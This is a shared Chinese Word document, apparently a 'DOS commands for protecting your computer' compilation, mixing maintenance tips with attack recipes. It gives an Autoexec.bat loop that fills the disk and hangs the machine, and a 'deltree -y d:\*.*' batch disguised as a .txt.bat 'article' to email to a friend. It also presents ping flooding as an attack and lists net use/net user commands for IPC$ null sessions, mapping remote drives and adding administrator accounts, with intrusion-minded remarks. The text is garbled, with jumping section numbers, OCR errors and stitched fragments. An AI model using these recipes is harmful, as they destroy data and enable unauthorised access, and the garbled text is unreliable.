如何利用dos语言保护计算机.docx
《如何利用dos语言保护计算机.docx》由会员分享,可在线阅读,更多相关《如何利用dos语言保护计算机.docx(22页珍藏版)》请在冰豆网上搜索。
如何利用dos语言保护计算机
如何利用dos语言保护计算机?
(dos命令大全)
一、给非法用户设置个小陷阱
在Windows目录中建立一个winstart.bat文件(如果已经存在该文件,则按如下所示修改其内容),并在该文件中加入以下几行命令:
@echooff
choice/c:
&/n/3
上面代码中的“&”为我们设置的密码,可以自行设置。
这样,在启动Windows时系统将要求你输入密码,表现在屏幕上就是光标一闪一闪的,造成非法用户以为Windows死机的假像,有时,就连部分高手也会上当受骗。
当我们要进入系统时,只要输入“&”即可
二、用“魔咒”跟电脑开个玩笑
怎样让电脑死机呢?
当然有很多方法,这里介绍一种非常简单的方法。
打开C盘根目录下的Autoexec.bat文件(如果不存在,可以自行建立),然后将其中的内容全部删除,输入下面两行命令:
@cd>>notepad
@%0
然后保存就可以了。
解释一下上面的命令:
“@”符号表示在DOS下不显示后面的命令,这样就可以把危险指令掩藏起来,来个神不知鬼不觉。
“cd>>notepad’就是把当前的目录拷贝成一个名为notepad的文件,“>>”表示保存到,和“>”不同的是,“>>”会将保存结果加到文件的最后,而“>”是覆盖的意思。
所以,用“>>”的结果就是保存的文件越来越大!
“%0”的意思是不断地重复上面一条指令,其结果就是名为notepad的文件会越来越大,直到填满整个硬盘,此时,你的电脑就只有死机一条路可以走了。
如果你重新启动电脑,只会看到;StartingMS-DOS...之后就会死机了,而且期间会不接受任何指令。
要去掉这条“魔咒”,只要用软盘启动电脑,或跳过Autoexec.bat文件的执行,再把上面的指令去掉就行了。
三、在DOS下解锁注册表编辑器
大家知道,注册表编辑器被禁用后很是棘手,特别是reg文件打开方式被更改后,就无法通过导入reg文件来解锁注册表了。
不过,在DOS下我们也可以给注册表解锁,具体方法是:
在纯DOS下,输入如下命令:
REGEDIT/DHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools。
回车,会出现一个标题栏为“注册表编辑器”的对话框,里面写着“,确实要把HKEY_CURRENT_USER\......DisableRegistryTools内的信息添加到注册表吗?
”点击“确定”即可。
浏览恶意网页导致注册表被禁用后,不妨试试本方法。
四、用Doskey命令“封杀”format
对格式化程序~rmat命令大家一定很害怕吧?
某些病毒一侵入,就给你的硬盘来个格式化,后悔都来不及,只得重装系统,不仅麻烦,而且资料不保!
现在你不必害怕了,在DOS下键入如下命令:
C:
\doskeyFORMAT=BadCommandOrfilename!
回车,就将format命令给“封杀”了,当病毒或恶意程序格式化你的硬盘时,系统将会显示:
BadcommandOrfilename!
如果你自己想格式化,怎么办呢?
可以在DOS下键入如下命令:
C:
\doskeyFORMAT=,然后回车就可以了。
注:
Doskey为DOS提供的锁定命令。
五、在DOS下检查是否中木马
一般说来,中了木马的机器会开有特定的端口。
一般一台个人用的Win9x系统在开机后最多只有137、138、139这3个端口(若上网冲浪会有其他端口,这是本机与网上主机通讯时打开的,如IE会打开1025、1026、1027……,QQ会打开4000、4001……)。
由于Netstat命令是通过读取内存中的“kernelroutingtables”来获得网络信息,所以用它来发现一般的木马还是很容易的。
在DOS命令行下用netstat-na命令可以看到本机所有打开的连接,如:
C:
\WINDOWS>netstat-na
ActiveCofmectiogs
ProtoLocalAddressForeignAddressState
TCPXXX.XXX.XXX.XXX:
1370.0.0.0:
0LISTENING
TCPXXX.XXX.XXX.XXX:
1380.0.0.0:
0LISTENING
TCPXXX.XXX.XXX.XXX:
1390.0.0.0:
0LISTENING
UDPXXX.XXX.XXX.XXX:
137*:
*
UDPXXX.XXX.XXX.XXX:
138*:
*
发现有其他端口打开的话就要查查看子,你很有可能中木马了。
怎么样?
在DOS下也可以检查是否中木马了,很棒吧!
首先新建一个文本文件,在其中输入以下内容:
STARTC:
\PROGRA~1\SKYNET\FIREWALL\SNFW.EXE
STARTC:
\PROGRA~1\OUTLOO~1,EXE\MSIMN.EXE
然后另存为GO.BAT即可(名字随便起,只要是后缀为BAT就可以了)。
由于OUTLOOKEXPRESS默认设置为启动时发送和接受邮件,只要我们执行GO.BAT,他就会自动启动天网防火墙,接着就会启动OE,OE就会连线上网,如此达到了上网即可打开防火墙的目的。
这里需要指出的是:
DOS下不支持长文件名,最多8个字符,所以ProgramFiles应写成Progra~!
,命令格式即为“start文件存放路径”。
十、删除不必要的文件
在Windows下保存着许多我们并个需要的文件,如Temp目录和Rcenet目录下的文件,回收站中的文件以及IE的历史记录和Cookie等丈仆,如果手工来清除它们实在是太麻烦了,我们可以在Autoexec.bat中加入一些内容,使得每次启动Windows时就删除这些文件,这样就省事多了!
用记事本打开C:
\Autoexec.bat文件,编辑内容如下:
EchoY
ifexistc:
\windows\temp\*.*delc:
\windows\temp\*.*>nul
ifexistc:
\windows\Tempor~1\*.*delc:
\windows\Tempor~1\*.*>nul
ifexistc:
\windows\History\*.*delc:
\windows\History\*.*>nul
ifexistc:
\windows\recent\*.*delc:
\windows\recent\*.*>nul
ifexistc:
\windows\cookies\*.*delc:
\windows\cookies\*.*>nul
此批处理第二行为删除临时文件夹的内容;第三、四行为删除IE浏览器打开网页后遗留下的内容;第五行为删除“开始”→“文档”中的内容;第六行为删除回收站里的内容;第六行为删除Cookies。
十一、更改指定文件的日期
要修改名为XXX.exe(任意exe文件)的日期,可以在MS—DOS方式下键入copyXXX.exe+,,(注:
加号后紧跟2个逗号),系统询问时键入“Y”,即将文件更改为当前日期。
十二、恢复在DOS下删除的文件
Windows98的回收站只能恢复在Windows里删除的内容,用以下方法可恢复Windows98的DOS模式下删除的文件:
先运行“Lock”命令,解除WindOWS对磁盘访问的限制,再使用命令“UnDelete”恢复。
或重新启动进入DOS,运行“UnDelete”也行,不过动作要快,否则被其他新建文件覆盖了就没有办法了。
十三、在DOS下制作启动盘
当Windows98系统崩溃而你又不得不重装系统的时候,如果伯;以前忘了制作启动盘,那么不要着急,这时还可以在DOS环境下制作。
具体方法是:
运行Windows目录下的Command文件夹中的一个名为Bootdisk的批处理文件。
运行后出现下列信息:
Pleasespecifythedriveletterofyourfloopydrive.
PresslforAOr
Press2forB:
Chooseanoption[1,2]?
一般都选择1,之后屏幕会出现—些英文信息。
放入一张磁盘后,按回车,…张启动盘很快就制作成了。
十四、DOS中的注册表修理命令
在DOS状态下,输入命令行“Scanreg/fix,系统会对当前的注册表进行修复,如果你觉得系统有些不正常,试试这个命令吧,也许能解决问题。
十五、和朋友开个玩笑
这是个危险的游戏,切记:
只有真心想让朋友痛揍一顿的人才可以使用!
用记事本编辑一个文本文件,里面只有一句:
deltree-yd:
\*.*,然后另存为“我的文章.txt.bat’
用E-mail附件发送给他。
由于Windows支持双后缀名,这样,
在你的朋友看来这个文件就是:
我的文章.txt。
谁又知道这是个批处理文件呢?
如果他双击这篇所谓的“文章”,
那他D盘下的文件就不保了。
防范方法:
不要随便打开附件,如果实在想看,一定要用记事本打开。
将系统中的危险命令删除或改名。
另外,让系统能显示双重扩展名,在“资源管理器”中点击“查看(v)”→“文件夹选项”→“查看”,将“隐藏已知文件类型的扩展名”前面的“√”去掉。
再次声明:
这样做是很危险的!
虽然这算不上病毒,但它们的危害有时比病毒还要大。
DOS命令与DOS讲解
〔作者:
小雨沙沙转贴自:
本站收集整理点击数:
172875更新时间:
2004-7-11文章录入:
小雨沙沙〕
一,ping
它是用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:
网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。
下面就来看看它的一些常用的操作。
先看看帮助吧,在DOS窗口中键入:
ping/?
回车,在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
-t表示将不间断向目标IP发送数据包,直到我们强迫其停止。
试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。
-l定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。
结合上面介绍的-t参数一起使用,会有更好的效果哦。
-n定义向目标IP发送数据包的次数,默认为3次。
如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。
说明一下,如果-t参数和-n参数一起使用,ping命令就以放在后面的参数为标准,比如“pingIP-t-n3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping3次。
另外,ping命令不一定非得pingIP,也可以直接ping主机域名,这样就可以得到主机的IP。
下面我们举个例子来说明一下具体用法,
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小。
从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。
这里TTL=32表示操作系统可能是win98。
(小知识:
如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)
至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。
二,nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。
在此我们就有必要了解几个基本的参数。
-a使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。
-A这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。
用法:
netstat-aIP。
-r列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。
用法:
netstat-rIP。
四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。
用法:
tracertIP。
五,net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。
首先让我们来看一看它都有那些子命令,键入net/?
回车。
大家可能看到了,这么多命令该怎么用?
其实也用不到那么多,掌握几个基本的就够了。
首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open主机IPftp端口”回车即可,一般端口默认都是21,可以不写。
接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。
用户名和密码都是ftp,密码是不显示的。
当提示****loggedin时,就说明登陆成功。
这里因为是匿名登陆,所以用户显示为Anonymous。
接下来就要介绍具体命令的使用方法了。
dir跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
cd进入某个文件夹。
get下载文件到本地机器。
put上传文件到远程服务器。
这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么利用就不多说了,大家就自由发挥去吧。
delete删除远程ftp服务器上的文件。
这也必须保证你有可写的权限。
bye退出当前连接。
quit同上。
八,telnet
功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。
为什么?
它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。
下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息。
然后在提示符下键入openIP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。
这里我使用的超级管理员权限登陆的。
到这里为止,网络DOS命令的介绍就告一段落了,这里介绍的目的只是给菜鸟网管一个印象,让其知道熟悉和掌握网络DOS命令的重要性。
其实和网络有关的DOS命令还远不止这些,这里只是抛砖引玉,希望能对广大菜鸟网管有所帮助。
学好DOS对当好网管有很大的帮助,特别的熟练掌握了一些网络的DOS命令。
另外大家应该清楚,任何人要想进入系统,必须得有一个合法的用户名和密码(输入法漏洞差不多绝迹了吧),哪怕你拿到帐户的只有一个很小的权限,你也可以利用它来达到最后的目的。
所以坚决消灭空口令,给自己的帐户加上一个强壮的密码,是最好的防御弱口令入侵的方法。
最后,由衷的说一句,培养良好的安全意识才是最重要的。
DOS讲解
虽然现在大家用的都是Windows9x或是Windows2000/XP,而且我们在这里学习的主要内容也是DOS所不擅长的网络!
但即使是在Windows风行的现在我们也离不开DOS。
如果你能熟练使用DOS,那它可以给你带来极大的方便!
而且在我们的Windows出现问题的时候大多也都是用DOS来修复的,所以学习一些DOS知识是必要的。
在这里我给大家讲的是一些用来安装和修复系统的命令,并不涉及网络方面!
基础
DOS是英语中DiskOperationSystem(磁盘操作系统)的缩写,其实DOS的版本有很多,比如MS-DOS、PC-DOS、FreeDOS等等,现在我们最常用的是MS-DOS(MS是Microsoft的缩写),在1995年前,当Windows95还没有出现的年代里,那是DOS的天下。
MS-DOS的最终独立版本是MS-DOS6.22,再后来的DOS7.0及其它后续版本都是在Windows里带的,不是单独发行版本。
在DOS环境下,我们面对的不是桌面和图标,而是这样的电脑屏幕:
这个C:
\>叫做提示符,这个闪动的横线叫做光标。
这时候DOS已经准备好,我们现在所需要做的,就是输入一个命令让DOS去执行。
在DOS中,每条命令输入完成后要都要以回车做为确认或者说是终结,例:
在DOS里,盘符用英文字母加上冒号来表示(如:
A:
、C:
、D:
),Windows中的“文件夹”被称为“目录”,用“\”来分隔不同层的目录,最上层的单独一个“\”(如:
C:
\或只一个\)叫“根目录”,我们可以输入dir(显示目录内容,以后将讲到它的具体使用方法)命令来查看当前目录中的子目录及文件,例:
如图所示,后面带有<DIR>的是目录,没有的则是文件。
在DOS中,文件名的规则是8.3形式,即一个文件名由文件基本名和文件扩展名组成,中间用点“.”隔开,文件基本名由不超过8个英文字母或数字组成,文件扩展名由不超过三个英文字母或数字组成,文件基本名必须有,扩展名可以没有。
看上图,第一列的就是“文件基本名”,第二列的是“文件扩展名”。
注意:
在用dir命令显示文件列表时,文件基本名和扩展名之间并无“.”分隔符,但你在输入完整的文件名时必须输入它。
第三列显示的是文件的大小,表示它占用了多少存储空间,也就是文件包含信息的多少,包含的信息越多,文件就越大;
第四列表示的是文件建立的日期或者是最后被改动的日期,每个文件都有对应的生成时间,就象每个人都有自己的生日一样,文件的生成时间就是文件形成的时候。
时间采用通常的表示方法,由年、月、日组成。
最后一列表示文件生成的具体时间,最后的一个字母a表示上午,p表示下午。
我们再来看看倒数一二行,这些是什么意思呢。
“10file(s)”是要告诉你这个目录内有“10”个文件,这些文件加起来一共有“64,692bytes”大,在这种计算中,每个子目录也算是一个文件,但它的大小算零。
最后一行的是告诉你当前你的工作磁盘上还剩下“215,735,513bytes”大小可用的磁盘空间。
用dir命令来查看磁盘上文件时,你会发现文件后缀(即文件扩展名)有很多种,它们当中大部分都是有一定含义的。
其中凡后缀为exe、com或bat的文件都是可以直接执行的。
这些以exe为后缀的文件叫可执行文件;以com为后缀的文件叫命令文件;以bat为后缀的文件叫批处理文件。
如果我们要执行这些文件,只需在提示符下敲入文件基本名然后回车即可,不需输入文件后缀。
基本命令
DOS的命令使用方法,大多都是这种格式:
命令名参数1[参数2][参数3|参数4][参数5:
选项][参数6:
]
说明:
以上命令中“命令名”是必要的,加方括号的参数是可选的,加竖线的两个命令只能选其一,加大括号的是必选项。
如上命令解释是这样的:
命令名是必须要有的;“参数1”是必须的;“参数2”是可选的;“参数3”和“参数4”两个参数只能选用其中一个,不能两个同时用;“参数5”使用时要加选项,用“:
”分隔;“参数6”使用时要加选项,但“选项1”和“选项2”要且仅能选用其中一个,不能两个都用,但也不能两个都不用。
这也是DOS命令书写的规范吧!
所有的DOS命令使用方法都是这样写的,大家也可以自己看看,一般的命令都可以用“/?
”参数或不加参数来查看帮助,在这里我们只讲这些命令的基本使用方法。
有些命令在使用时,可以使用“通配符”。
通配符有两个,“*”和“?
”,其中“*”代表任意个任何字符,“?
”只代表一个任意字符。
在有些命令中,驱动器和路径是可选项,如果不指明驱去器名,默认为当前驱去器,如果不指明目录则默认为当前目录。
dir
使用方法:
DIR[盘符:
][路径][文件名][/P][/W][/A]
/P每满一页时暂停
/W使用横向显示方式
/A显示所以文件
/B只显示文件名
功能:
显示一类或所以文件列表,支持通配符。
例:
cd
使用方法:
cd[目录名[\目录名][\目录名]...]
功能:
显示或改变当前目录
例:
md
使用方法:
md[盘符:
][路径]目录名
功能:
建立一个新目录
例:
del
使用方法:
del[盘符:
][路径]文件名
功能:
删除一个或多个文件,可以使用通配符。
例:
删除一个文件:
按此在新窗口浏览图片
删除扩展名为sys的文件:
按此在新窗口浏览图片
删除所有文件:
deltree
使用方法:
deltree[盘符:
][路径]目录名
功能:
删除一个目录,删除目录同时将删除目录中的所有文件
例:
ren
使用方法:
ren[盘符:
][路径]原文件名修改后文件名
功能:
修改文件名
例:
netuse\\ip\ipc$""/user:
""建立IPC空链接
netuse\\ip\ipc$"密码"/user:
"用户名"建立IPC非空链接
netuseh:
\\ip\c$"密码"/user:
"用户名"直接登陆后映射对方C:
到本地为H:
netuseh:
\\ip\c$登陆后映射对方C:
到本地为H:
netuse\\ip\ipc$/del删除IPC链接
netuseh:
/del删除映射对方到本地的为H:
的映射
netuser用户名 密码 /add建立用户
netuserguest/active:
yes激活guest用户
netuser查看有哪些用户
netuser帐户名查看帐户的属性
netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:
admin
升级会员 